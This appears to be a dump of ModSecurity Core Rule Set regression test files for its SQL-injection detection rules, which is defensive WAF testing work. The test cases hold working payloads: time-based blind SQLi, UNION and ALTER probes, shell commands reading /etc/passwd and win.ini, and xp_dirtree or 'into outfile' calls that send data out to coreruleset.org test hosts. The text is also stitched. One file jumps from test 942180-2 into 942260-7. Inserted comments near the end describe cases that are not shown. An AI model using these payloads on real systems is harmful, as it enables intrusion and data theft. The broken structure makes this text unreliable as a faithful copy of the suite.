Host: localhost method: POST port: 80 uri: "/" data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new 
Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-19 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\\foobar.txt\" or sleep(4) #" version: HTTP/1.0 output: log_contains: id "942150" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml000066400000000000000000000073771446122515100277320ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942160.yaml tests: - test_title: 942160-1 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?sql_table=sleep%28534543%29" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-2 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "sleEP(3)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-3 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "sleep(5000)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-4 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BENChmARk(2999/**/999,Md5(NoW()" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-5 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BEncHMARk(2999999,Md5(NoW('')" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-6 desc: "SQL Injection Attack: 
Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BENCHMARK(5000000,MD5(0x48416166)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-7 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "benchmark(3000000,M%445(4)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-8 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-9 desc: "SQL Injection Attack: Blind SQLi Test Using sleep() or benchmark()" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" version: HTTP/1.0 output: log_contains: id "942160" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml000066400000000000000000000017511446122515100277220ustar00rootroot00000000000000--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942180.yaml tests: - test_title: 942180-1 desc: "basic SQL authentication bypass" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # something simple like 3' ' 1 uri: "/?var=3%27%20%27%201" version: HTTP/1.0 output: log_contains: id "942180" - test_title: 942180-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" version: HTTP/1.0 data: "javascript:\"/*'/*`/*-->%ptkjp;" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-7 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-8 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-9 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=`echo crs312``echo 34test`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-10 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-11 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 
output: log_contains: id "942260" - test_title: 942260-12 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-13 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-14 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-15 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-16 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-17 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" 
data: "var=test@coreruleset.org\"|type %SYSTEMROOT%\\win.ini" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-18 desc: "Traces of XSS" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=mytest>'>\">" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-19 desc: "Advanced SQL authentication bypass" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"123-456-123@coreruleset.org\"' and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-20 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-21 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"-->'-->`-->" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-22 desc: "Traces of XSS" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var='\">" version: HTTP/1.0 output: log_contains: id "942260" 
�����������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml��������0000664�0000000�0000000�00000001016�14461225151�0027714�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942270.yaml tests: - test_title: 942270-1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=union%20select%20col%20from" version: HTTP/1.0 output: log_contains: id "942270" 
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml��������0000664�0000000�0000000�00000001017�14461225151�0027716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942280.yaml tests: - test_title: 942280-1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=select%20pg_sleep" version: HTTP/1.0 output: log_contains: id "942280" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml��������0000664�0000000�0000000�00000001633�14461225151�0027723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: csanders-git description: None enabled: true name: 942290.yaml tests: - test_title: 942290-1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: /mongo/show.php?u_id[$ne]=2 headers: User-Agent: ModSecurity CRS 3 Tests Host: localhost output: log_contains: id "942290" - test_title: 942290-2 desc: "basic MongoDB SQL injection attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?mongoQ=%5b%24lte%5dasdfsd" version: HTTP/1.0 output: log_contains: id 
"942290" �����������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml��������0000664�0000000�0000000�00000000765�14461225151�0027720�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942300.yaml tests: - test_title: 942300-1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=) when 234 then&foo=bar" version: HTTP/1.0 output: log_contains: id "942300" �����������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml��������0000664�0000000�0000000�00000000747�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942310.yaml tests: - test_title: 942310-1 desc: "chained SQL injection attempts 2/2" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=%22%27%20and%20%3d%20bar" version: HTTP/1.0 output: log_contains: id "942310" �������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml��������0000664�0000000�0000000�00000003433�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942320.yaml tests: - test_title: 942320-1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=procedure%20analyse%20%28" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=exec+%28%40%0A" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=declare+%40b%0A" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" 
data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" version: HTTP/1.0 output: log_contains: id "942320" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml��������0000664�0000000�0000000�00000000743�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942330.yaml tests: - test_title: 942330-1 desc: "classic SQL injection probings 1/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%22%27&var2=whatever" version: HTTP/1.0 output: log_contains: id "942330" �����������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml��������0000664�0000000�0000000�00000001030�14461225151�0027706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942340.yaml tests: - test_title: 942340-1 desc: "basic SQL authentication bypass attempts 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # in ( select * from uri: "/?var=in%20%28%20select%20%2a%20from" version: HTTP/1.0 output: log_contains: id "942340" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml��������0000664�0000000�0000000�00000001777�14461225151�0027731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron, Franziska Bühler" description: None enabled: true name: 942350.yaml tests: - test_title: 942350-1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # ; insert INTO table (word) VALUES('dfsd') uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" version: HTTP/1.0 output: log_contains: id "942350" - test_title: 942350-2 desc: "Fix for FP reported in GitHub issue 1587" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # ;insertion_424242 uri: "/?var=%3Binsertion_424242" version: HTTP/1.0 output: no_log_contains: id "942350" �modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml��������0000664�0000000�0000000�00000032544�14461225151�0027726�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron, Christoph Hansen, Franziska Buehler" description: None enabled: true name: 942360.yaml tests: - test_title: 942360-1 desc: "concatenated basic SQL injection and SQLLFI" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # 23423 as "sdfsdfs" FROM table data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "select Char(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT CHAR(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT GROUP_CONCAT(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT group_cOnCat(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as cc FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS orders FROM" version: HTTP/1.0 
output: log_contains: id "942360" - test_title: 942360-8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS `carrier_id` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "select load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS Role FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `edit_user_id` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS val FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%60+REGEXP%20" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS 'Durchschnitt_Importzeit' FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-15 desc: "Detects 
concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `OXTIMESTAMP` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as col_0_0_ from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS `count` FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS schlagwoerter FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as User from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS t FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "(load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 
127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as ExecuteTheseSQLCommands FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS schlagwoerter FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `documentType` FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "! As' from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "; As not from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "6 As\" from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as day1 
FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-30 desc: GH issue 1580 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: ", aside from" version: HTTP/1.0 output: no_log_contains: id "942360" - test_title: 942360-31 desc: GH issue 1605 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: "a=/create" version: HTTP/1.0 output: no_log_contains: id "942360" - test_title: 942360-32 desc: GH issue 1605 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: "a=/CREATE TABLE Persons" version: HTTP/1.0 output: log_contains: id "942360" ������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml��������0000664�0000000�0000000�00000005613�14461225151�0027724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942361.yaml tests: - test_title: 942361-1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'alter a" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - 
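stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\" ALTER A" version: HTTP/1.0 output: log_contains: id "942361"
  # Rule 942361 regression cases 3-7, restored to one key per line (the
  # extraction had collapsed the block structure onto a single line).
  # Each case is positive: it expects a log entry matching id "942361" for a
  # POST body made of a quote followed by ALTER or UNION.
  # Every 942361 case visible on this page uses log_contains; none checks a
  # benign input with no_log_contains, so false positives for this rule are
  # not exercised here.
  - test_title: 942361-3
    desc: "Detects basic SQL injection based on keyword alter or union"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "'ALTER A"
            version: HTTP/1.0
          output:
            log_contains: id "942361"
  - test_title: 942361-4
    desc: "Detects basic SQL injection based on keyword alter or union"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "' alter/"
            version: HTTP/1.0
          output:
            log_contains: id "942361"
  - test_title: 942361-5
    desc: "Detects basic SQL injection based on keyword alter or union"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "\" UNION A"
            version: HTTP/1.0
          output:
            log_contains: id "942361"
  - test_title: 942361-6
    desc: "Detects basic SQL injection based on keyword alter or union"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "'UNION A"
            version: HTTP/1.0
          output:
            log_contains: id "942361"
  - test_title: 942361-7
    desc: "Detects basic SQL injection based on keyword alter or union"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "' union/"
            version: HTTP/1.0
          output:
            log_contains: id "942361"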
���������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml��������0000664�0000000�0000000�00000000732�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942370.yaml tests: - test_title: 942370-1 desc: "classic SQL injection probings 2/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=\"` * 12344" version: HTTP/1.0 output: log_contains: id "942370" ��������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml��������0000664�0000000�0000000�00000045272�14461225151�0027732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942380.yaml tests: - test_title: 942380-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from `db_miwf`.`sys_refindex` limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 
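uri: "/" data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" version: HTTP/1.0 output: log_contains: id "942380"
  # Rule 942380 regression cases 3-43, restored to one key per line (the
  # extraction had collapsed the block structure onto a few long lines).
  # Every case here is positive: it expects a log entry matching
  # id "942380" for the given POST body.
  # No stage sets a Content-Type header, so how the body is decoded before
  # the rule inspects it depends on the test harness defaults (TODO confirm).
  # No benign-input case (no_log_contains) appears in this span, so false
  # positives for this rule are not exercised here.
  # Case 2 above and case 44 below continue outside these lines and are left
  # exactly as found.
  - test_title: 942380-3
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
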